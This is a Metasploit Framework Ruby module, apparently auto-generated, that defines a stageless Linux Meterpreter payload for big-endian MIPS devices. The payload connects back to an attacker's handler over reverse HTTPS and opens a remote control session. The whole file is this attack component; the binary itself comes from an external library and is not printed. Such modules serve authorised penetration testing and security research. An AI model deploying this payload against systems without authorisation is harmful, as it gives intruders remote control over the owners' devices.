## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1516524 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig def initialize(info = {}) super( update_info( info, 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseHttps, 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux ) ) end def generate(_opts = {}) opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec end end